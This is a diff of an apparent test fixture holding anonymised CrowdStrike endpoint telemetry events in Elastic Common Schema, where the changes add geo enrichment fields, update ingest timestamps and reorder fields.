"{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkListenIP4\",\"ContextTimeStamp\":\"1625677507.037\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364432308748445743\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"50647\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP4MacV10\",\"id\":\"ffffffff-1111-11eb-8b36-06a8af5164a9\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff23d24c4193ffa6f270775ee5\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677507086\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:07.086Z", "kind": "event", @@ -2277,12 +2598,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffa7bf46da689501ce58bd6987", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffa7bf46da689501ce58bd6987", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:36.729Z", "file": { @@ -2306,7 +2636,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150759600Z", + "ingested": "2021-12-14T14:41:26.533761448Z", "original": "{\"event_simpleName\":\"ExecutableDeleted\",\"ContextTimeStamp\":\"1625677536.729\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364994904864288322\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ExecutableDeletedMacV1\",\"id\":\"ffffffff-1111-11eb-8ca0-0231588e8cbb\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffa7bf46da689501ce58bd6987\",\"timestamp\":\"1625677536784\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user3/Library/Caches/com.tinyspeck.slackmacgap.ShipIt/update.FXKsmFO/Slack.app/Contents/Frameworks/Squirrel.framework/Versions/A/Resources/ShipIt\"}", "created": "2021-07-07T17:05:36.784Z", "kind": "event", @@ -2345,12 +2675,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "fffffffffc2c4e4fa9c08e1a8388e5f9", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "fffffffffc2c4e4fa9c08e1a8388e5f9", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:04.542Z", "file": { @@ -2377,7 +2716,7 @@ }, "event": { "action": "GzipFileWritten", - "ingested": "2021-12-09T13:36:11.150766Z", + "ingested": "2021-12-14T14:41:26.533761829Z", "original": "{\"event_simpleName\":\"GzipFileWritten\",\"ContextTimeStamp\":\"1625677504.542\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"362897421906895953\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"04000001000000000000000000000000501f510700000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"GzipFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-9320-06d410e6f705\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffffc2c4e4fa9c08e1a8388e5f9\",\"timestamp\":\"1625677504614\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/powerlog/Library/BatteryLife/Archives/powerlog_2021-07-05_CC5F9FC1.PLSQL.gz\"}", "id": "ffffffff-1111-11eb-9320-06d410e6f705", "created": "2021-07-07T17:05:04.614Z" @@ -2392,17 +2731,23 @@ }, { "observer": { - "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T01:52:50.595Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, @@ -2417,8 +2762,11 @@ "67.43.156.13" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.150772300Z", + "ingested": "2021-12-14T14:41:26.533762214Z", "original": "{\"event_simpleName\":\"IOServiceRegister\",\"ContextTimeStamp\":\"1625622770.595\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"67.43.156.13\",\"IOServiceClass\":\"IOUSBDevice:IOUSBNub:IOService:IORegistryEntry:OSObject\",\"ConfigBuild\":\"1007.4.0013701.1\",\"IOServicePath\":\"IOService:/IOResources/AppleUSBHostResources/AppleUSBLegacyRoot/AppleUSBVHCIBCE@80000000/Touch Bar Backlight@80700000\",\"event_platform\":\"Mac\",\"IOServiceProperties\":\"\",\"Entitlements\":\"15\",\"name\":\"IOServiceRegisterMacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"IOServiceName\":\"Touch Bar Backlight\",\"timestamp\":\"1625677480056\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:40.056Z", "kind": "event", @@ -2450,30 +2798,33 @@ ] }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "vendor": "crowdstrike", + "ip": "67.43.156.13", + "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "type": "agent", + "version": "1007.4.0013701.1" + }, "process": { "entity_id": "364938416497226937", "thread": { "id": 0 } }, + "@timestamp": "2021-07-07T01:50:02.031Z", "os": { "type": "macos" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff44564c2f8d76394cb25c31ab", - "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", - "vendor": "crowdstrike", - "ip": "67.43.156.13" - }, - "@timestamp": "2021-07-07T01:50:02.031Z", "ecs": { "version": "1.12.0" }, @@ -2489,7 +2840,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150778600Z", + "ingested": "2021-12-14T14:41:26.533762612Z", "original": "{\"event_simpleName\":\"PtyCreated\",\"ContextTimeStamp\":\"1625622602.031\",\"ConfigStateHash\":\"3967242894\",\"ContextProcessId\":\"364938416497226937\",\"DeviceId\":\"251658248\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.13\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"PtyCreatedMacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677478739\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:38.739Z", "kind": "event", @@ -2510,31 +2861,36 @@ "DeviceId": "251658248", "Entitlements": "15", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } - }, - { - "os": { - "type": "macos" - }, - "source": { - "address": "67.43.156.14", - "ip": "67.43.156.14" }, "url": { "scheme": "http" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { - "serial_number": "ffffffff5ae3449ab33a1809fe6c5ce2", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff5ae3449ab33a1809fe6c5ce2", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:35.967Z", + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, @@ -2549,8 +2905,24 @@ "67.43.156.14" ] }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "ip": "67.43.156.14" + }, "event": { - "ingested": "2021-12-09T13:36:11.150784800Z", + "ingested": "2021-12-14T14:41:26.533763004Z", "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"LocalIpAddressRemovedIP4\",\"ConfigStateHash\":\"1803419442\",\"aip\":\"67.43.156.14\",\"InterfaceIndex\":\"18\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"NetLuidIndex\":\"2\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressRemovedIP4MacV1\",\"id\":\"ffffffff-1111-11eb-b7b7-066cc89bcebf\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff5ae3449ab33a1809fe6c5ce2\",\"timestamp\":\"1625677475967\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:35.967Z", "kind": "state", @@ -2573,7 +2945,13 @@ "name": "LocalIpAddressRemovedIP4MacV1", "EffectiveTransmissionClass": "2", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -2605,12 +2983,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffff335f47ca89cad6a19f203bbd", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.8.0011308.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff335f47ca89cad6a19f203bbd", + "type": "agent", + "version": "1007.8.0011308.1" }, "@timestamp": "2021-07-07T17:04:34.875Z", "ecs": { @@ -2630,7 +3017,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150791400Z", + "ingested": "2021-12-14T14:41:26.533763504Z", "original": "{\"event_simpleName\":\"NetworkCloseIP6\",\"ContextTimeStamp\":\"1625677474.875\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"12241681491990\",\"RemotePort\":\"9\",\"aip\":\"67.43.156.13\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"59999\",\"Entitlements\":\"15\",\"name\":\"NetworkCloseIP6LinV6\",\"id\":\"ffffffff-1111-11eb-8130-02cde7751097\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff335f47ca89cad6a19f203bbd\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677475413\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:35.413Z", "kind": "event", @@ -2657,17 +3044,23 @@ }, { "observer": { - "serial_number": "ffffffffa74a4c89b9984a3a7124bb9d", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011611.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffa74a4c89b9984a3a7124bb9d", + "type": "agent", + "version": "1007.8.0011611.1" }, "@timestamp": "2021-07-07T17:04:50.580Z", - "os": { - "type": "linux" - }, "ecs": { "version": "1.12.0" }, @@ -2682,8 +3075,11 @@ "67.43.156.14" ] }, + "os": { + "type": "linux" + }, "event": { - "ingested": "2021-12-09T13:36:11.150797700Z", + "ingested": "2021-12-14T14:41:26.533763902Z", "original": "{\"ConfigBuild\":\"1007.8.0011611.1\",\"event_simpleName\":\"ConfigStateUpdate\",\"event_platform\":\"Lin\",\"ConfigStateHash\":\"1156120155\",\"ConfigStateData\":\"0,0,1007.8.0011611.1|1,c,0|1,22,6|1,59,2d|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|\",\"name\":\"ConfigStateUpdateLinV2\",\"aip\":\"67.43.156.14\",\"id\":\"ffffffff-1111-11eb-af89-06c111484f9f\",\"aid\":\"ffffffffa74a4c89b9984a3a7124bb9d\",\"timestamp\":\"1625677490580\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:50.580Z", "kind": "event", @@ -2717,30 +3113,33 @@ ] }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", + "serial_number": "ffffffff0cd64fb78626ab1b6c65ac8c", + "type": "agent", + "version": "1007.4.0013701.1" + }, "process": { "entity_id": "364839648316192383", "thread": { "id": 0 } }, + "@timestamp": "2021-07-07T17:04:53.531Z", "os": { "type": "macos" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff0cd64fb78626ab1b6c65ac8c", - "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "@timestamp": "2021-07-07T17:04:53.531Z", "ecs": { "version": "1.12.0" }, @@ -2756,7 +3155,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150804Z", + "ingested": "2021-12-14T14:41:26.533764382Z", "original": "{\"event_simpleName\":\"SuspiciousDnsRequest\",\"ContextTimeStamp\":\"1625677493.531\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364839648316192383\",\"DomainName\":\"hg-t2.dotice.me\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"SuspiciousDnsRequestMacV1\",\"id\":\"ffffffff-1111-11eb-a4a3-02cbdfb8f529\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff0cd64fb78626ab1b6c65ac8c\",\"timestamp\":\"1625677493756\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"RequestType\":\"1\"}", "created": "2021-07-07T17:04:53.756Z", "kind": "alert", @@ -2778,21 +3177,33 @@ "Entitlements": "15", "cid": "ffffffff15754bcfb5f9152ec7ac90ac", "RequestType": "1" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { - "serial_number": "ffffffffabd047b1a86c1fcd8ef22b59", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011611.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffabd047b1a86c1fcd8ef22b59", + "type": "agent", + "version": "1007.8.0011611.1" }, "@timestamp": "2021-07-07T17:05:30.922Z", - "os": { - "type": "linux" - }, "ecs": { "version": "1.12.0" }, @@ -2807,8 +3218,11 @@ "67.43.156.14" ] }, + "os": { + "type": "linux" + }, "event": { - "ingested": "2021-12-09T13:36:11.150810300Z", + "ingested": "2021-12-14T14:41:26.533764761Z", "original": "{\"Parameter2\":\"0\",\"event_simpleName\":\"ErrorEvent\",\"Parameter1\":\"18446744072635810412\",\"Parameter3\":\"0\",\"ConfigStateHash\":\"1156120155\",\"aip\":\"67.43.156.14\",\"Line\":\"96\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"ErrorStatus\":\"3759276032\",\"name\":\"ErrorEventLinV1\",\"id\":\"ffffffff-1111-11eb-bdd3-0681aa29cecb\",\"Facility\":\"16778240\",\"aid\":\"ffffffffabd047b1a86c1fcd8ef22b59\",\"File\":\"0\",\"timestamp\":\"1625677530922\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:30.922Z", "kind": "alert", @@ -2843,17 +3257,23 @@ }, { "observer": { - "serial_number": "ffffffffa15a452190ae454f7d33e07e", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffa15a452190ae454f7d33e07e", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:30.590Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, @@ -2868,8 +3288,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.150816600Z", + "ingested": "2021-12-14T14:41:26.533765207Z", "original": "{\"event_simpleName\":\"ConfigStateUpdate\",\"ConfigStateHash\":\"3090255842\",\"ConfigStateData\":\"0,0,1007.4.0013701.1|1,2,1|1,4,a|1,6,0|1,8,46|1,a,1|1,c,0|1,17,1f|1,18,18|1,19,0|1,1e,407|1,21,3d2|1,27,1|1,53,18b|1,56,0|1,d0,16d|1,d1,0|1,d2,0|1,df,4c|1,e0,6|1,f6,1|1,1f5,1|1,1f7,1|1,1fd,1|1,200,0|2,0,138,a8000000032,140000000085,140000000153,18000000004c,18000000004f,180000000050,180000000051,180000000054,1800000000e1,1800000000e7,180000000144,18000000014e,18000000015a,18000000020e,180000000226,180000000227,180400000079,18040000009b,18040000009c,1804000000ff,180400000117,180400000118,180400000142,180400000163,180400000164,180400000166,180400000167,1804000001b2,1804000001f2,1804000001f3,180400000225,1804000002be,1804000002bf,1804000002ca,1804000002cb,1808000000c9,1808000000ee,1808000000fc,1808000000fd,1808000000fe,180c0000016b,180c0000016c,180c0000016d,180c0000016e,180c0000016f,180c00000170,180c000001b6,180c000001b7,180c000001b8,180c000001b9,180c000001f6,180c000001f7,180c000001f8,180c000002c2,180c000002c3,180c000002c4,180c000002ce,180c000002cf,180c000002d0,18100000011e,18100000011f,181000000120,181000000121,181000000122,181000000123,181000000124,181000000125,181000000126,181000000128,181000000169,18100000016a,181000000180,1810000001b1,1810000001c3,18100000021f,181000000220,18100000024e,18100000025b,181000000280,1810000002ad,1810000002d6,1810000002d7,1810000002f3,1c04000000a1,1c04000000a2,1c04000000a3,1c04000000a4,1c04000000a5,1c04000000a6,1c040000011a,1c040000011b,1c040000011c,1c0400000268,1c0400000269,1c040000026a,1c040000026c,1c040000026d,1c040000026e,1c0400000271,1c0400000272,1c0400000273,1c0400000275,1c0400000276,1c0400000277,1c040000028f,1c0400000290,1c0400000291,1c0400000293,1c0400000294,1c0400000295,1c0400000297,1c0400000298,1c0400000299,1c040000029b,1c040000029c,1c040000029d,1c040000029f,1c04000002a0|3,0,65|\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ConfigStateUpdateMacV2\",\"id\":\"ffffffff-1111-11eb-8dc4-0234c12f9875\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffa15a452190ae454f7d33e07e\",\"timestamp\":\"1625677530590\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:30.590Z", "kind": "event", @@ -2927,30 +3350,33 @@ ] }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", + "serial_number": "ffffffffaa0e47a1b009aef151d6179d", + "type": "agent", + "version": "1007.4.0013701.1" + }, "process": { "entity_id": "364867547408058681", "thread": { "id": 0 } }, + "@timestamp": "2021-07-07T17:05:09.064Z", "os": { "type": "macos" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffffaa0e47a1b009aef151d6179d", - "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "@timestamp": "2021-07-07T17:05:09.064Z", "ecs": { "version": "1.12.0" }, @@ -2966,7 +3392,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150822900Z", + "ingested": "2021-12-14T14:41:26.533765625Z", "original": "{\"event_simpleName\":\"KextLoad\",\"ContextTimeStamp\":\"1625677509.064\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364867547408058681\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"BundleID\":\"com.apple.driver.AudioAUUC\",\"Entitlements\":\"15\",\"name\":\"KextLoadMacV1\",\"id\":\"ffffffff-1111-11eb-a2ae-028f6bf89be7\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffaa0e47a1b009aef151d6179d\",\"timestamp\":\"1625677509069\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:09.069Z", "kind": "event", @@ -2987,21 +3413,33 @@ "EffectiveTransmissionClass": "2", "Entitlements": "15", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { - "serial_number": "ffffffff67d54f7daf3d998ffc74d48e", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011110.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff67d54f7daf3d998ffc74d48e", + "type": "agent", + "version": "1007.8.0011110.1" }, "@timestamp": "2021-07-07T17:05:07.901Z", - "os": { - "type": "linux" - }, "ecs": { "version": "1.12.0" }, @@ -3016,9 +3454,12 @@ "67.43.156.14" ] }, + "os": { + "type": "linux" + }, "event": { "action": "ChannelVersionRequired", - "ingested": "2021-12-09T13:36:11.150829300Z", + "ingested": "2021-12-14T14:41:26.533766069Z", "original": "{\"ChannelVersion\":\"25\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"3155796140\",\"aip\":\"67.43.156.14\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"20\",\"ConfigBuild\":\"1007.8.0011110.1\",\"event_platform\":\"Lin\",\"name\":\"ChannelVersionRequiredLinV1\",\"id\":\"ffffffff-1111-11eb-b411-06baeacb7a63\",\"aid\":\"ffffffff67d54f7daf3d998ffc74d48e\",\"timestamp\":\"1625677507901\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-b411-06baeacb7a63", "created": "2021-07-07T17:05:07.901Z" @@ -3065,12 +3506,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffe22549479fbe8293b6747a68", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011308.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffe22549479fbe8293b6747a68", + "type": "agent", + "version": "1007.8.0011308.1" }, "@timestamp": "2021-07-07T17:05:11.754Z", "ecs": { @@ -3089,7 +3539,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150835800Z", + "ingested": "2021-12-14T14:41:26.533766451Z", "original": "{\"event_simpleName\":\"ProcessRollup2Stats\",\"ConfigStateHash\":\"2037712541\",\"Timeout\":\"60\",\"ParentProcessId\":\"0\",\"aip\":\"67.43.156.14\",\"SuppressType\":\"3\",\"SHA256HashData\":\"64e48365207d0c19008ba7d53d75c0de3fcd5a1590e4c40fc69c677663fedc20\",\"ProcessCount\":\"60\",\"BoundedCount\":\"57\",\"ConfigBuild\":\"1007.8.0011308.1\",\"UID\":\"115\",\"event_platform\":\"Lin\",\"CommandLine\":\"sh -c \\\"/usr/lib/erlang/erts-11.1.3/bin/epmd\\\" -daemon\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2StatsLinV3\",\"id\":\"ffffffff-1111-11eb-b34e-063f4cefccb3\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffe22549479fbe8293b6747a68\",\"timestamp\":\"1625677511754\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:11.754Z", "kind": "state", @@ -3119,24 +3569,27 @@ } }, { - "os": { - "type": "macos" - }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], "observer": { - "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:38.122Z", + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, @@ -3155,7 +3608,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150842Z", + "ingested": "2021-12-14T14:41:26.533766894Z", "original": "{\"event_simpleName\":\"UserIdentity\",\"LoginSessionId\":\"1138166333440\",\"AuthenticationUuidAsString\":\"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109\",\"UserName\":\"user1\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"67.43.156.13\",\"AuthenticationId\":\"265\",\"UserPrincipal\":\"user1@dom1\",\"UserSid\":\"S-1-5-21-3852557355-3178143607-2040168074-1530\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"265\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"UserIdentityMacV4\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"AuthenticationUuid\":\"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109\",\"timestamp\":\"1625677478122\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:38.122Z", "kind": "event", @@ -3189,21 +3642,33 @@ "id": "265", "email": "user1@dom1", "domain": "dom1" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { - "serial_number": "ffffffff45d647e6ae0ba8764a4bd570", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff45d647e6ae0ba8764a4bd570", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:49.052Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, @@ -3219,9 +3684,12 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { "action": "DeliverLocalFXToCloud", - "ingested": "2021-12-09T13:36:11.150848500Z", + "ingested": "2021-12-14T14:41:26.533767276Z", "original": 